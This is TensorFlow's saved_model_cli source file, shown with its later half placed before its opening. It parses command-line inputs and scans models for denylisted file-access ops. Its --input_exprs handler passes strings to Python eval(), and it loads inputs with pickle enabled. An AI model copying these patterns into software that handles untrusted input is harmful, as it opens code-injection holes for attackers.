tag_set: Group of tag(s) of the MetaGraphDef with the SignatureDef map, in
string format, separated by ','. For tag-set contains multiple tags, all
tags must be passed in.
Returns:
A SignatureDef map that maps from string keys to SignatureDefs.
"""
meta_graph = saved_model_utils.get_meta_graph_def(saved_model_dir, tag_set)
return meta_graph.signature_def
def scan_meta_graph_def(meta_graph_def):
"""Scans meta_graph_def and reports if there are ops on denylist.
Print ops if they are on black list, or print success if no denylisted ops
found.
Args:
meta_graph_def: MetaGraphDef protocol buffer.
"""
all_ops_set = set(
meta_graph_lib.ops_used_by_graph_def(meta_graph_def.graph_def))
denylisted_ops = _OP_DENYLIST & all_ops_set
if denylisted_ops:
# TODO(yifeif): print more warnings
print(
'MetaGraph with tag set %s contains the following denylisted ops:' %
meta_graph_def.meta_info_def.tags, denylisted_ops)
else:
print('MetaGraph with tag set %s does not contain denylisted ops.' %
meta_graph_def.meta_info_def.tags)
def run_saved_model_with_feed_dict(saved_model_dir, tag_set, signature_def_key,
input_tensor_key_feed_dict, outdir,
overwrite_flag, worker=None, init_tpu=False,
tf_debug=False):
"""Runs SavedModel and fetch all outputs.
Runs the input dictionary through the MetaGraphDef within a SavedModel
specified by the given tag_set and SignatureDef. Also save the outputs to file
if outdir is not None.
Args:
saved_model_dir: Directory containing the SavedModel to execute.
tag_set: Group of tag(s) of the MetaGraphDef with the SignatureDef map, in
string format, separated by ','. For tag-set contains multiple tags, all
tags must be passed in.
signature_def_key: A SignatureDef key string.
input_tensor_key_feed_dict: A dictionary maps input keys to numpy ndarrays.
outdir: A directory to save the outputs to. If the directory doesn't exist,
it will be created.
overwrite_flag: A boolean flag to allow overwrite output file if file with
the same name exists.
worker: If provided, the session will be run on the worker. Valid worker
specification is a bns or gRPC path.
init_tpu: If true, the TPU system will be initialized after the session
is created.
tf_debug: A boolean flag to use TensorFlow Debugger (TFDBG) to observe the
intermediate Tensor values and runtime GraphDefs while running the
SavedModel.
Raises:
ValueError: When any of the input tensor keys is not valid.
RuntimeError: An error when output file already exists and overwrite is not
enabled.
"""
# Get a list of output tensor names.
meta_graph_def = saved_model_utils.get_meta_graph_def(saved_model_dir,
tag_set)
# Re-create feed_dict based on input tensor name instead of key as session.run
# uses tensor name.
inputs_tensor_info = _get_inputs_tensor_info_from_meta_graph_def(
meta_graph_def, signature_def_key)
# Check if input tensor keys are valid.
for input_key_name in input_tensor_key_feed_dict.keys():
if input_key_name not in inputs_tensor_info:
raise ValueError(
'"%s" is not a valid input key. Please choose from %s, or use '
'--show option.' %
(input_key_name, '"' + '", "'.join(inputs_tensor_info.keys()) + '"'))
inputs_feed_dict = {
inputs_tensor_info[key].name: tensor
for key, tensor in input_tensor_key_feed_dict.items()
}
# Get outputs
outputs_tensor_info = _get_outputs_tensor_info_from_meta_graph_def(
meta_graph_def, signature_def_key)
# Sort to preserve order because we need to go from value to key later.
output_tensor_keys_sorted = sorted(outputs_tensor_info.keys())
output_tensor_names_sorted = [
outputs_tensor_info[tensor_key].name
for tensor_key in output_tensor_keys_sorted
]
with session.Session(worker, graph=ops_lib.Graph()) as sess:
if init_tpu:
print('Initializing TPU System ...')
# This is needed for freshly started worker, or if the job
# restarts after a preemption.
sess.run(tpu.initialize_system())
loader.load(sess, tag_set.split(','), saved_model_dir)
if tf_debug:
sess = local_cli_wrapper.LocalCLIDebugWrapperSession(sess)
outputs = sess.run(output_tensor_names_sorted, feed_dict=inputs_feed_dict)
for i, output in enumerate(outputs):
output_tensor_key = output_tensor_keys_sorted[i]
print('Result for output key %s:\n%s' % (output_tensor_key, output))
# Only save if outdir is specified.
if outdir:
# Create directory if outdir does not exist
if not os.path.isdir(outdir):
os.makedirs(outdir)
output_full_path = os.path.join(outdir, output_tensor_key + '.npy')
# If overwrite not enabled and file already exist, error out
if not overwrite_flag and os.path.exists(output_full_path):
raise RuntimeError(
'Output file %s already exists. Add \"--overwrite\" to overwrite'
' the existing output files.' % output_full_path)
np.save(output_full_path, output)
print('Output %s is saved to %s' % (output_tensor_key,
output_full_path))
def preprocess_inputs_arg_string(inputs_str):
"""Parses input arg into dictionary that maps input to file/variable tuple.
Parses input string in the format of, for example,
"input1=filename1[variable_name1],input2=filename2" into a
dictionary looks like
{'input_key1': (filename1, variable_name1),
'input_key2': (file2, None)}
, which maps input keys to a tuple of file name and variable name(None if
empty).
Args:
inputs_str: A string that specified where to load inputs. Inputs are
separated by semicolons.
* For each input key:
'<input_key>=<filename>' or
'<input_key>=<filename>[<variable_name>]'
* The optional 'variable_name' key will be set to None if not specified.
Returns:
A dictionary that maps input keys to a tuple of file name and variable name.
Raises:
RuntimeError: An error when the given input string is in a bad format.
"""
input_dict = {}
inputs_raw = inputs_str.split(';')
for input_raw in filter(bool, inputs_raw): # skip empty strings
# Format of input=filename[variable_name]'
match = re.match(r'([^=]+)=([^\[\]]+)\[([^\[\]]+)\]$', input_raw)
if match:
input_dict[match.group(1)] = match.group(2), match.group(3)
else:
# Format of input=filename'
match = re.match(r'([^=]+)=([^\[\]]+)$', input_raw)
if match:
input_dict[match.group(1)] = match.group(2), None
else:
raise RuntimeError(
'--inputs "%s" format is incorrect. Please follow'
'"<input_key>=<filename>", or'
'"<input_key>=<filename>[<variable_name>]"' % input_raw)
return input_dict
def preprocess_input_exprs_arg_string(input_exprs_str):
"""Parses input arg into dictionary that maps input key to python expression.
Parses input string in the format of 'input_key=<python expression>' into a
dictionary that maps each input_key to its python expression.
Args:
input_exprs_str: A string that specifies python expression for input keys.
Each input is separated by semicolon. For each input key:
'input_key=<python expression>'
Returns:
A dictionary that maps input keys to their values.
Raises:
RuntimeError: An error when the given input string is in a bad format.
"""
input_dict = {}
for input_raw in filter(bool, input_exprs_str.split(';')):
if '=' not in input_exprs_str:
raise RuntimeError('--input_exprs "%s" format is incorrect. Please follow'
'"<input_key>=<python expression>"' % input_exprs_str)
input_key, expr = input_raw.split('=', 1)
# ast.literal_eval does not work with numpy expressions
input_dict[input_key] = eval(expr) # pylint: disable=eval-used
return input_dict
def preprocess_input_examples_arg_string(input_examples_str):
"""Parses input into dict that maps input keys to lists of tf.Example.
Parses input string in the format of 'input_key1=[{feature_name:
feature_list}];input_key2=[{feature_name:feature_list}];' into a dictionary
that maps each input_key to its list of serialized tf.Example.
Args:
input_examples_str: A string that specifies a list of dictionaries of
feature_names and their feature_lists for each input.
Each input is separated by semicolon. For each input key:
'input=[{feature_name1: feature_list1, feature_name2:feature_list2}]'
items in feature_list can be the type of float, int, long or str.
Returns:
A dictionary that maps input keys to lists of serialized tf.Example.
Raises:
ValueError: An error when the given tf.Example is not a list.
"""
input_dict = preprocess_input_exprs_arg_string(input_examples_str)
for input_key, example_list in input_dict.items():
if not isinstance(example_list, list):
raise ValueError(
'tf.Example input must be a list of dictionaries, but "%s" is %s' %
(example_list, type(example_list)))
input_dict[input_key] = [
_create_example_string(example) for example in example_list
]
return input_dict
def _create_example_string(example_dict):
"""Create a serialized tf.example from feature dictionary."""
example = example_pb2.Example()
for feature_name, feature_list in example_dict.items():
if not isinstance(feature_list, list):
raise ValueError('feature value must be a list, but %s: "%s" is %s' %
(feature_name, feature_list, type(feature_list)))
if isinstance(feature_list[0], float):
example.features.feature[feature_name].float_list.value.extend(
feature_list)
elif isinstance(feature_list[0], str):
example.features.feature[feature_name].bytes_list.value.extend(
[f.encode('utf8') for f in feature_list])
elif isinstance(feature_list[0], bytes):
example.features.feature[feature_name].bytes_list.value.extend(
feature_list)
elif isinstance(feature_list[0], six.integer_types):
example.features.feature[feature_name].int64_list.value.extend(
feature_list)
else:
raise ValueError(
'Type %s for value %s is not supported for tf.train.Feature.' %
(type(feature_list[0]), feature_list[0]))
return example.SerializeToString()
def load_inputs_from_input_arg_string(inputs_str, input_exprs_str,
input_examples_str):
"""Parses input arg strings and create inputs feed_dict.
Parses '--inputs' string for inputs to be loaded from file, and parses
'--input_exprs' string for inputs to be evaluated from python expression.
'--input_examples' string for inputs to be created from tf.example feature
dictionary list.
Args:
inputs_str: A string that specified where to load inputs. Each input is
separated by semicolon.
* For each input key:
'<input_key>=<filename>' or
'<input_key>=<filename>[<variable_name>]'
* The optional 'variable_name' key will be set to None if not specified.
* File specified by 'filename' will be loaded using numpy.load. Inputs
can be loaded from only .npy, .npz or pickle files.
* The "[variable_name]" key is optional depending on the input file type
as descripted in more details below.
When loading from a npy file, which always contains a numpy ndarray, the
content will be directly assigned to the specified input tensor. If a
variable_name is specified, it will be ignored and a warning will be
issued.
When loading from a npz zip file, user can specify which variable within
the zip file to load for the input tensor inside the square brackets. If
nothing is specified, this function will check that only one file is
included in the zip and load it for the specified input tensor.
When loading from a pickle file, if no variable_name is specified in the
square brackets, whatever that is inside the pickle file will be passed
to the specified input tensor, else SavedModel CLI will assume a
dictionary is stored in the pickle file and the value corresponding to
the variable_name will be used.
input_exprs_str: A string that specifies python expressions for inputs.
* In the format of: '<input_key>=<python expression>'.
* numpy module is available as np.
input_examples_str: A string that specifies tf.Example with dictionary.
* In the format of: '<input_key>=<[{feature:value list}]>'
Returns:
A dictionary that maps input tensor keys to numpy ndarrays.
Raises:
RuntimeError: An error when a key is specified, but the input file contains
multiple numpy ndarrays, none of which matches the given key.
RuntimeError: An error when no key is specified, but the input file contains
more than one numpy ndarrays.
"""
tensor_key_feed_dict = {}
inputs = preprocess_inputs_arg_string(inputs_str)
input_exprs = preprocess_input_exprs_arg_string(input_exprs_str)
input_examples = preprocess_input_examples_arg_string(input_examples_str)
for input_tensor_key, (filename, variable_name) in inputs.items():
data = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True) # pylint: disable=unexpected-keyword-arg
# When a variable_name key is specified for the input file
if variable_name:
# if file contains a single ndarray, ignore the input name
if isinstance(data, np.ndarray):
logging.warn(
'Input file %s contains a single ndarray. Name key \"%s\" ignored.'
% (filename, variable_name))
tensor_key_feed_dict[input_tensor_key] = data
else:
if variable_name in data:
tensor_key_feed_dict[input_tensor_key] = data[variable_name]
else:
raise RuntimeError(
'Input file %s does not contain variable with name \"%s\".' %
(filename, variable_name))
# When no key is specified for the input file.
else:
# Check if npz file only contains a single numpy ndarray.
if isinstance(data, np.lib.npyio.NpzFile):
variable_name_list = data.files
if len(variable_name_list) != 1:
raise RuntimeError(
'Input file %s contains more than one ndarrays. Please specify '
'the name of ndarray to use.' % filename)
tensor_key_feed_dict[input_tensor_key] = data[variable_name_list[0]]
else:
tensor_key_feed_dict[input_tensor_key] = data
# When input is a python expression:
for input_tensor_key, py_expr_evaluated in input_exprs.items():
if input_tensor_key in tensor_key_feed_dict:
logging.warn(
'input_key %s has been specified with both --inputs and --input_exprs'
' options. Value in --input_exprs will be used.' % input_tensor_key)
tensor_key_feed_dict[input_tensor_key] = py_expr_evaluated
# When input is a tf.Example:
for input_tensor_key, example in input_examples.items():
if input_tensor_key in tensor_key_feed_dict:
logging.warn(
'input_key %s has been specified in multiple options. Value in '
'--input_examples will be used.' % input_tensor_key)
tensor_key_feed_dict[input_tensor_key] = example
return tensor_key_feed_dict
def show(args):
"""Function triggered by show command.
Args:
args: A namespace parsed from command line.
"""
# If all tag is specified, display all information.
if args.all:
_show_all(args.dir)
else:
# If no tag is specified, display all tag_set, if no signature_def key is
# specified, display all SignatureDef keys, else show input output tensor
# information corresponding to the given SignatureDef key
if args.tag_set is None:
_show_tag_sets(args.dir)
else:
if args.signature_def is None:
_show_signature_def_map_keys(args.dir, args.tag_set)
else:
_show_inputs_outputs(args.dir, args.tag_set, args.signature_def)
def run(args):
"""Function triggered by run command.
Args:
args: A namespace parsed from command line.
Raises:
AttributeError: An error when neither --inputs nor --input_exprs is passed
to run command.
"""
if not args.inputs and not args.input_exprs and not args.input_examples:
raise AttributeError(
'At least one of --inputs, --input_exprs or --input_examples must be '
'required')
tensor_key_feed_dict = load_inputs_from_input_arg_string(
args.inputs, args.input_exprs, args.input_examples)
run_saved_model_with_feed_dict(args.dir, args.tag_set, args.signature_def,
tensor_key_feed_dict, args.outdir,
args.overwrite, worker=args.worker,
init_tpu=args.init_tpu, tf_debug=args.tf_debug)
def scan(args):
"""Function triggered by scan command.
Args:
args: A namespace parsed from command line.
"""
if args.tag_set:
scan_meta_graph_def(
saved_model_utils.get_meta_graph_def(args.dir, args.tag_set))
else:
saved_model = saved_model_utils.read_saved_model(args.dir)
for meta_graph_def in saved_model.meta_graphs:
scan_meta_graph_def(meta_graph_def)
def convert_with_tensorrt(args):
"""Function triggered by 'convert tensorrt' command.
Args:
args: A namespace parsed from command line.
"""
# Import here instead of at top, because this will crash if TensorRT is
# not installed
from tensorflow.python.compiler.tensorrt import trt_convert as trt # pylint: disable=g-import-not-at-top
if not args.convert_tf1_model:
params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
max_workspace_size_bytes=args.max_workspace_size_bytes,
precision_mode=args.precision_mode,
minimum_segment_size=args.minimum_segment_size)
converter = trt.TrtGraphConverterV2(
input_saved_model_dir=args.dir,
input_saved_model_tags=args.tag_set.split(','),
conversion_params=params)
try:
converter.convert()
except Exception as e:
raise RuntimeError(
'{}. Try passing "--convert_tf1_model=True".'.format(e))
converter.save(output_saved_model_dir=args.output_dir)
else:
trt.create_inference_graph(
None,
None,
max_batch_size=1,
max_workspace_size_bytes=args.max_workspace_size_bytes,
precision_mode=args.precision_mode,
minimum_segment_size=args.minimum_segment_size,
is_dynamic_op=True,
input_saved_model_dir=args.dir,
input_saved_model_tags=args.tag_set.split(','),
output_saved_model_dir=args.output_dir)
def aot_compile_cpu(args):
"""Function triggered by aot_compile_cpu command.
Args:
args: A namespace parsed from command line.
"""
checkpoint_path = (
args.checkpoint_path
or os.path.join(args.dir, 'variables/variables'))
if not args.variables_to_feed:
variables_to_feed = []
elif args.variables_to_feed.lower() == 'all':
variables_to_feed = None # We will identify them after.
else:
variables_to_feed = args.variables_to_feed.split(',')
saved_model_aot_compile.aot_compile_cpu_meta_graph_def(
checkpoint_path=checkpoint_path,
meta_graph_def=saved_model_utils.get_meta_graph_def(
args.dir, args.tag_set),
signature_def_key=args.signature_def_key,
variables_to_feed=variables_to_feed,
output_prefix=args.output_prefix,
target_triple=args.target_triple,
target_cpu=args.target_cpu,
cpp_class=args.cpp_class,
multithreading=args.multithreading.lower() not in ('f', 'false', '0'))
def add_show_subparser(subparsers):
"""Add parser for `show`."""
show_msg = (
'Usage examples:\n'
'To show all tag-sets in a SavedModel:\n'
'$saved_model_cli show --dir /tmp/saved_model\n\n'
'To show all available SignatureDef keys in a '
'MetaGraphDef specified by its tag-set:\n'
'$saved_model_cli show --dir /tmp/saved_model --tag_set serve\n\n'
'For a MetaGraphDef with multiple tags in the tag-set, all tags must be '
'passed in, separated by \';\':\n'
'$saved_model_cli show --dir /tmp/saved_model --tag_set serve,gpu\n\n'
'To show all inputs and outputs TensorInfo for a specific'
' SignatureDef specified by the SignatureDef key in a'
' MetaGraph.\n'
'$saved_model_cli show --dir /tmp/saved_model --tag_set serve'
' --signature_def serving_default\n\n'
'To show all available information in the SavedModel:\n'
'$saved_model_cli show --dir /tmp/saved_model --all')
parser_show = subparsers.add_parser(
'show',
description=show_msg,
formatter_class=argparse.RawTextHelpFormatter)
parser_show.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to inspect')
parser_show.add_argument(
'--all',
action='store_true',
help='if set, will output all information in given SavedModel')
parser_show.add_argument(
'--tag_set',
type=str,
default=None,
help='tag-set of graph in SavedModel to show, separated by \',\'')
parser_show.add_argument(
'--signature_def',
type=str,
default=None,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to display input(s) and output(s) for')
parser_show.set_defaults(func=show)
def add_run_subparser(subparsers):
"""Add parser for `run`."""
run_msg = ('Usage example:\n'
'To run input tensors from files through a MetaGraphDef and save'
' the output tensors to files:\n'
'$saved_model_cli show --dir /tmp/saved_model --tag_set serve \\\n'
' --signature_def serving_default \\\n'
' --inputs input1_key=/tmp/124.npz[x],input2_key=/tmp/123.npy '
'\\\n'
' --input_exprs \'input3_key=np.ones(2)\' \\\n'
' --input_examples '
'\'input4_key=[{"id":[26],"weights":[0.5, 0.5]}]\' \\\n'
' --outdir=/out\n\n'
'For more information about input file format, please see:\n'
'https://www.tensorflow.org/guide/saved_model_cli\n')
parser_run = subparsers.add_parser(
'run', description=run_msg, formatter_class=argparse.RawTextHelpFormatter)
parser_run.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
parser_run.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to load, separated by \',\'')
parser_run.add_argument(
'--signature_def',
type=str,
required=True,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to run')
msg = ('Loading inputs from files, in the format of \'<input_key>=<filename>,'
' or \'<input_key>=<filename>[<variable_name>]\', separated by \';\'.'
' The file format can only be from .npy, .npz or pickle.')
parser_run.add_argument('--inputs', type=str, default='', help=msg)
msg = ('Specifying inputs by python expressions, in the format of'
' "<input_key>=\'<python expression>\'", separated by \';\'. '
'numpy module is available as \'np\'. '
'Will override duplicate input keys from --inputs option.')
parser_run.add_argument('--input_exprs', type=str, default='', help=msg)
msg = (
'Specifying tf.Example inputs as list of dictionaries. For example: '
'<input_key>=[{feature0:value_list,feature1:value_list}]. Use ";" to '
'separate input keys. Will override duplicate input keys from --inputs '
'and --input_exprs option.')
parser_run.add_argument('--input_examples', type=str, default='', help=msg)
parser_run.add_argument(
'--outdir',
type=str,
default=None,
help='if specified, output tensor(s) will be saved to given directory')
parser_run.add_argument(
'--overwrite',
action='store_true',
help='if set, output file will be overwritten if it already exists.')
parser_run.add_argument(
'--tf_debug',
action='store_true',
help='if set, will use TensorFlow Debugger (tfdbg) to watch the '
'intermediate Tensors and runtime GraphDefs while running the '
'SavedModel.')
parser_run.add_argument(
'--worker',
type=str,
default=None,
help='if specified, a Session will be run on the worker. '
'Valid worker specification is a bns or gRPC path.')
parser_run.add_argument(
'--init_tpu',
action='store_true',
default=None,
help='if specified, tpu.initialize_system will be called on the Session. '
'This option should be only used if the worker is a TPU job.')
parser_run.set_defaults(func=run)
def add_scan_subparser(subparsers):
"""Add parser for `scan`."""
scan_msg = ('Usage example:\n'
'To scan for denylisted ops in SavedModel:\n'
'$saved_model_cli scan --dir /tmp/saved_model\n'
'To scan a specific MetaGraph, pass in --tag_set\n')
parser_scan = subparsers.add_parser(
'scan',
description=scan_msg,
formatter_class=argparse.RawTextHelpFormatter)
parser_scan.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
parser_scan.add_argument(
'--tag_set',
type=str,
help='tag-set of graph in SavedModel to scan, separated by \',\'')
parser_scan.set_defaults(func=scan)
def add_convert_subparser(subparsers):
"""Add parser for `convert`."""
convert_msg = ('Usage example:\n'
'To convert the SavedModel to one that have TensorRT ops:\n'
'$saved_model_cli convert \\\n'
' --dir /tmp/saved_model \\\n'
' --tag_set serve \\\n'
' --output_dir /tmp/saved_model_trt \\\n'
' tensorrt \n')
parser_convert = subparsers.add_parser(
'convert',
description=convert_msg,
formatter_class=argparse.RawTextHelpFormatter)
parser_convert.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
parser_convert.add_argument(
'--output_dir',
type=str,
required=True,
help='output directory for the converted SavedModel')
parser_convert.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
convert_subparsers = parser_convert.add_subparsers(
title='conversion methods',
description='valid conversion methods',
help='the conversion to run with the SavedModel')
parser_convert_with_tensorrt = convert_subparsers.add_parser(
'tensorrt',
description='Convert the SavedModel with Tensorflow-TensorRT integration',
formatter_class=argparse.RawTextHelpFormatter)
parser_convert_with_tensorrt.add_argument(
'--max_workspace_size_bytes',
type=int,
default=2 << 20,
help=('the maximum GPU temporary memory which the TRT engine can use at '
'execution time'))
parser_convert_with_tensorrt.add_argument(
'--precision_mode',
type=str,
default='FP32',
help='one of FP32, FP16 and INT8')
parser_convert_with_tensorrt.add_argument(
'--minimum_segment_size',
type=int,
default=3,
help=('the minimum number of nodes required for a subgraph to be replaced'
'in a TensorRT node'))
parser_convert_with_tensorrt.add_argument(
'--convert_tf1_model',
type=bool,
default=False,
help='support TRT conversion for TF1 models')
parser_convert_with_tensorrt.set_defaults(func=convert_with_tensorrt)
def add_aot_compile_cpu_subparser(subparsers):
"""Add parser for `aot_compile_cpu`."""
compile_msg = '\n'.join(
['Usage example:',
'To compile a SavedModel signature via (CPU) XLA AOT:',
'$saved_model_cli aot_compile_cpu \\',
' --dir /tmp/saved_model \\',
' --tag_set serve \\',
' --output_dir /tmp/saved_model_xla_aot',
'', '',
'Note: Additional XLA compilation options are available by setting the ',
'XLA_FLAGS environment variable. See the XLA debug options flags for ',
'all the options: ',
' {}'.format(_XLA_DEBUG_OPTIONS_URL),
'',
'For example, to disable XLA fast math when compiling:',
'',
'XLA_FLAGS="--xla_cpu_enable_fast_math=false" $saved_model_cli '
'aot_compile_cpu ...',
'',
'Some possibly useful flags:',
' --xla_cpu_enable_fast_math=false',
' --xla_force_host_platform_device_count=<num threads>',
' (useful in conjunction with disabling multi threading)'
])
parser_compile = subparsers.add_parser(
'aot_compile_cpu',
description=compile_msg,
formatter_class=argparse.RawTextHelpFormatter)
parser_compile.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
parser_compile.add_argument(
'--output_prefix',
type=str,
required=True,
help=('output directory + filename prefix for the resulting header(s) '
'and object file(s)'))
parser_compile.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
parser_compile.add_argument(
'--signature_def_key',
type=str,
default=signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY,
help=('signature_def key to use. '
'default: DEFAULT_SERVING_SIGNATURE_DEF_KEY'))
parser_compile.add_argument(
'--target_triple',
type=str,
default='x86_64-pc-linux',
help=('Target triple for LLVM during AOT compilation. Examples: '
'x86_64-none-darwin, x86_64-apple-ios, arm64-none-ios, '
'armv7-none-android. More examples are available in tfcompile.bzl '
'in the tensorflow codebase.'))
parser_compile.add_argument(
'--target_cpu',
type=str,
default='',
help=('Target cpu name for LLVM during AOT compilation. Examples: '
'x86_64, skylake, haswell, westmere, <empty> (unknown). For '
'a complete list of options, run (for x86 targets): '
'`llc -march=x86 -mcpu=help`'))
parser_compile.add_argument(
'--checkpoint_path',
type=str,
default=None,
help='Custom checkpoint to use (default: use the SavedModel variables)')
parser_compile.add_argument(
'--cpp_class',
type=str,
required=True,
help=('The name of the generated C++ class, wrapping the generated '
'function. The syntax of this flag is '
'[[<optional_namespace>::],...]<class_name>. This mirrors the '
'C++ syntax for referring to a class, where multiple namespaces '
'may precede the class name, separated by double-colons. '
'The class will be generated in the given namespace(s), or if no '
'namespaces are given, within the global namespace.'))
parser_compile.add_argument(
'--variables_to_feed',
type=str,
default='',
help=('The names of variables that will be fed into the network. '
'Options are: empty (default; all variables are frozen, none may '
'be fed), \'all\' (all variables may be fed), or a '
'comma-delimited list of names of variables that may be fed. In '
'the last case, the non-fed variables will be frozen in the graph.'
'**NOTE** Any variables passed to `variables_to_feed` *must be set '
'by the user*. These variables will NOT be frozen and their '
'values will be uninitialized in the compiled object '
'(this applies to all input arguments from the signature as '
'well).'))
parser_compile.add_argument(
'--multithreading',
type=str,
default='False',
help=('Enable multithreading in the compiled computation. '
'Note that if using this option, the resulting object files '
'may have external dependencies on multithreading libraries '
'like nsync.'))
parser_compile.set_defaults(func=aot_compile_cpu)
def create_parser():
"""Creates a parser that parse the command line arguments.
Returns:
A namespace parsed from command line arguments.
"""
parser = argparse.ArgumentParser(
description='saved_model_cli: Command-line interface for SavedModel')
parser.add_argument('-v', '--version', action='version', version='0.1.0')
subparsers = parser.add_subparsers(
title='commands', description='valid commands', help='additional help')
# show command
add_show_subparser(subparsers)
# run command
add_run_subparser(subparsers)
# scan command
add_scan_subparser(subparsers)
# tensorrt convert command
add_convert_subparser(subparsers)
# aot_compile_cpu command
add_aot_compile_cpu_subparser(subparsers)
return parser
def main():
logging.set_verbosity(logging.INFO)
parser = create_parser()
args = parser.parse_args()
if not hasattr(args, 'func'):
parser.error('too few arguments')
args.func(args)
if __name__ == '__main__':
sys.exit(main())
| # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Command-line interface to inspect and execute a graph in a SavedModel.
For detailed usages and examples, please refer to:
https://www.tensorflow.org/guide/saved_model#cli_to_inspect_and_execute_savedmodel
"""
import argparse
import ast
import os
import re
import sys
from absl import app # pylint: disable=unused-import
import numpy as np
import six
from tensorflow.core.example import example_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.wrappers import local_cli_wrapper
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import meta_graph as meta_graph_lib
from tensorflow.python.framework import ops as ops_lib
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import loader
from tensorflow.python.saved_model import save
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.tools import saved_model_aot_compile
from tensorflow.python.tools import saved_model_utils
from tensorflow.python.tpu import tpu
from tensorflow.python.util.compat import collections_abc
_XLA_DEBUG_OPTIONS_URL = (
'https://github.com/tensorflow/tensorflow/blob/master/'
'tensorflow/compiler/xla/debug_options_flags.cc')
# Set of ops to denylist.
_OP_DENYLIST = set(['WriteFile', 'ReadFile', 'PrintV2'])
def _show_tag_sets(saved_model_dir):
"""Prints the tag-sets stored in SavedModel directory.
Prints all the tag-sets for MetaGraphs stored in SavedModel directory.
Args:
saved_model_dir: Directory containing the SavedModel to inspect.
"""
tag_sets = saved_model_utils.get_saved_model_tag_sets(saved_model_dir)
print('The given SavedModel contains the following tag-sets:')
for tag_set in sorted(tag_sets):
print('%r' % ', '.join(sorted(tag_set)))
def _show_signature_def_map_keys(saved_model_dir, tag_set):
"""Prints the keys for each SignatureDef in the SignatureDef map.
Prints the list of SignatureDef keys from the SignatureDef map specified by
the given tag-set and SavedModel directory.
Args:
saved_model_dir: Directory containing the SavedModel to inspect.
tag_set: Group of tag(s) of the MetaGraphDef to get SignatureDef map from,
in string format, separated by ','. For tag-set contains multiple tags,
all tags must be passed in.
"""
signature_def_map = get_signature_def_map(saved_model_dir, tag_set)
print('The given SavedModel MetaGraphDef contains SignatureDefs with the '
'following keys:')
for signature_def_key in sorted(signature_def_map.keys()):
print('SignatureDef key: \"%s\"' % signature_def_key)
def _get_inputs_tensor_info_from_meta_graph_def(meta_graph_def,
signature_def_key):
"""Gets TensorInfo for all inputs of the SignatureDef.
Returns a dictionary that maps each input key to its TensorInfo for the given
signature_def_key in the meta_graph_def
Args:
meta_graph_def: MetaGraphDef protocol buffer with the SignatureDef map to
look up SignatureDef key.
signature_def_key: A SignatureDef key string.
Returns:
A dictionary that maps input tensor keys to TensorInfos.
Raises:
ValueError if `signature_def_key` is not found in the MetaGraphDef.
"""
if signature_def_key not in meta_graph_def.signature_def:
raise ValueError(
f'Could not find signature "{signature_def_key}". Please choose from: '
f'{", ".join(meta_graph_def.signature_def.keys())}')
return meta_graph_def.signature_def[signature_def_key].inputs
def _get_outputs_tensor_info_from_meta_graph_def(meta_graph_def,
signature_def_key):
"""Gets TensorInfos for all outputs of the SignatureDef.
Returns a dictionary that maps each output key to its TensorInfo for the given
signature_def_key in the meta_graph_def.
Args:
meta_graph_def: MetaGraphDef protocol buffer with the SignatureDefmap to
look up signature_def_key.
signature_def_key: A SignatureDef key string.
Returns:
A dictionary that maps output tensor keys to TensorInfos.
"""
return meta_graph_def.signature_def[signature_def_key].outputs
def _show_inputs_outputs(saved_model_dir, tag_set, signature_def_key, indent=0):
"""Prints input and output TensorInfos.
Prints the details of input and output TensorInfos for the SignatureDef mapped
by the given signature_def_key.
Args:
saved_model_dir: Directory containing the SavedModel to inspect.
tag_set: Group of tag(s) of the MetaGraphDef, in string format, separated by
','. For tag-set contains multiple tags, all tags must be passed in.
signature_def_key: A SignatureDef key string.
indent: How far (in increments of 2 spaces) to indent each line of output.
"""
meta_graph_def = saved_model_utils.get_meta_graph_def(saved_model_dir,
tag_set)
inputs_tensor_info = _get_inputs_tensor_info_from_meta_graph_def(
meta_graph_def, signature_def_key)
outputs_tensor_info = _get_outputs_tensor_info_from_meta_graph_def(
meta_graph_def, signature_def_key)
indent_str = ' ' * indent
def in_print(s):
print(indent_str + s)
in_print('The given SavedModel SignatureDef contains the following input(s):')
for input_key, input_tensor in sorted(inputs_tensor_info.items()):
in_print(' inputs[\'%s\'] tensor_info:' % input_key)
_print_tensor_info(input_tensor, indent+1)
in_print('The given SavedModel SignatureDef contains the following '
'output(s):')
for output_key, output_tensor in sorted(outputs_tensor_info.items()):
in_print(' outputs[\'%s\'] tensor_info:' % output_key)
_print_tensor_info(output_tensor, indent+1)
in_print('Method name is: %s' %
meta_graph_def.signature_def[signature_def_key].method_name)
def _show_defined_functions(saved_model_dir):
"""Prints the callable concrete and polymorphic functions of the Saved Model.
Args:
saved_model_dir: Directory containing the SavedModel to inspect.
"""
meta_graphs = saved_model_utils.read_saved_model(saved_model_dir).meta_graphs
has_object_graph_def = False
for meta_graph_def in meta_graphs:
has_object_graph_def |= meta_graph_def.HasField('object_graph_def')
if not has_object_graph_def:
return
